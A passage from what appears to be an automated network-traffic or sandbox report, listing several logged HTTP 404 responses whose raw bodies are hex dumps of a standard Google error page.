46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:29 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:31 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:34 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:36 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:37 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 